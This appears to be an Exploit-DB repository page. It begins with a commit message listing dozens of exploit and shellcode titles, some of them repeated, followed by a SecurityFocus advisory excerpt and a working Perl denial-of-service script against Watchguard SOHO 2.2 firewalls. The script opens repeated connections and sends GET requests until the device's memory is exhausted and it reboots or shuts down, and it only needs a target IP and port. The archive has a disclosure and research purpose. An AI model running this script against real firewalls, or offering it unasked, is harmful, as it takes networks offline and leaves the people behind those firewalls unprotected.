
14991 changes to exploits/shellcodes HTC Touch - vCard over IP Denial of Service TeamSpeak 3.0.0-beta25 - Multiple Vulnerabilities PeerBlock 1.1 - Blue Screen of Death WS10 Data Server - SCADA Overflow (PoC) Symantec Endpoint Protection 12.1.4013 - Service Disabling Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow man-db 2.4.1 - 'open_cat_stream()' Local uid=man CDRecord's ReadCD - '$RSH exec()' SUID Shell Creation CDRecord's ReadCD - Local Privilege Escalation Anyburn 4.3 x86 - 'Copy disc to image file' Buffer Overflow (Unicode) (SEH) FreeBSD - Intel SYSRET Privilege Escalation (Metasploit) CCProxy 6.2 - 'ping' Remote Buffer Overflow Savant Web Server 3.1 - Remote Buffer Overflow (2) Litespeed Web Server 4.0.17 with PHP (FreeBSD) - Remote Overflow Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow QNAP TS-431 QTS < 4.2.2 - Remote Command Execution (Metasploit) Imperva SecureSphere 13.x - 'PWS' Command Injection (Metasploit) Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit) Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass) TeamCity < 9.0.2 - Disabled Registration Bypass OpenSSH SCP Client - Write Arbitrary Files Kados R10 GreenBee - Multiple SQL Injection WordPress Core 5.0 - Remote Code Execution phpBB 3.2.3 - Remote Code Execution Linux/x86 - Create File With Permission 7775 + exit() Shellcode (Generator) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
44 lines
No EOL
2.2 KiB
Perl
Executable file
44 lines
No EOL
2.2 KiB
Perl
Executable file
source: https://www.securityfocus.com/bid/2082/info
|
|
|
|
The SOHO 2.2 is a popular SOHO firewall by Watchguard Technologies Inc.
|
|
|
|
A vulnerability exists in Watchguard SOHO 2.2 firewalls with firmware versions 2.2.1 and below that could allow a remote attacker to execute a Denial of Service attack on the firewall and render it in-operable.
|
|
|
|
It is possible for a remote attacker to issue large amounts of GET requests (70+) to the firewall which will in turn deplete memory resources on the firewall and either cause it to reboot or shutdown completely. In the case of a reboot, the firewall will be in-operable for one to five minutes. If the firewall shuts down completely, it will require a power recycle. In the case of a sustained attack, the firewall can be permanently taken off-line. It should be noted that this attack does not appear in the firewall logs except for a reboot notification.
|
|
|
|
#!/usr/bin/perl
|
|
#
|
|
# You can also connect to the Watchguard SOHO through your
|
|
# browser and press F5 like a maniac on speed to get the
|
|
# firewall crashing. So, either you run the .pl script or
|
|
# you fire up your webbrowser... Either way, it works.
|
|
# ----------------------------------------------------------
|
|
# Disclaimer: this file is intended as proof of concept, and
|
|
# is not intended to be used for illegal purposes. I accept
|
|
# no responsibility for damage incurred by the use of it.
|
|
# ----------------------------------------------------------
|
|
# (c)Proof of concept, vorlon <filip@securax.be>
|
|
# ----------------------------------------------------------
|
|
use IO::Socket;
|
|
|
|
$host = "your_watchguard_ip";
|
|
$port = "your_port";
|
|
$repeat = "100";
|
|
$request = "GET / HTTP/1.0";
|
|
|
|
print "Watchguard SOHO Denial of Service, connecting to $host:$port...\n";
|
|
$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$host, PeerPort=>$port) ||
|
|
die "Failed.\n";
|
|
|
|
$counter = 0;
|
|
print "Repeating request for $repeat times.\n";
|
|
while($counter < $repeat) {
|
|
print $socket "$request\n";
|
|
$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$host,
|
|
PeerPort=>$port) || die "\nThe Watchguard SOHO has crashed. BEEFCAKE!...\n";
|
|
print ".";
|
|
$counter += 1;
|
|
}
|
|
print "\nDone.\n\n";
|
|
|
|
close($socket); |